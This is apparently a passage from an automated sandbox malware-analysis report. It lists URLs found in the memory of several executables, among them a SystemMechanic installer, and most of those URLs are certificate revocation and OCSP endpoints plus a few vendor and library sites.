                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://compositewpf.codeplex.com/
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2683790959.0000025676B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/License
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/Lic
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFonts
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://download.iolo.net
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.iolo.net/ds/4/en/images/dsUSB.imaRealDefense
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.000000000701F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, UniversalInstaller.exe, 00000012.00000002.1385724944.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000000.1373724889.00000000009AC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000014.00000000.1384104733.0000000000A3C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000014.00000002.1472732421.0000000000A3C000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, u48o.1.exe, 0000000E.00000000.1354291806.000000000041C000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://google.com
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                            Source: zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2651347788.00000256726B0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2520106531.0000025659B50000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2643813792.00000256724F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2656409195.0000025672900000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2676980665.0000025673250000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000000.1530072053.00000256576FB000.00000002.00000001.01000000.00000018.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, zLwT7vCojz.exe, 00000000.00000003.1362288506.0000000006F92000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                            Source: zLwT7vCojz.exe, 00000000.00000003.1328104582.000000000739E000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 0000000D.00000002.1428757674.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0&
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                            Source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000001A.00000002.2522422347.0000025659E43000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.0000000007278000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000003.1381447513.00000000048E4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                            Source: Qg_Appv5.exe, 0000000D.00000002.1455543827.00000000072C3000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000012.00000002.1388443959.000000000439E000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000014.00000002.1475541798.00000000036EB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000002.1713305532.00000000052A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
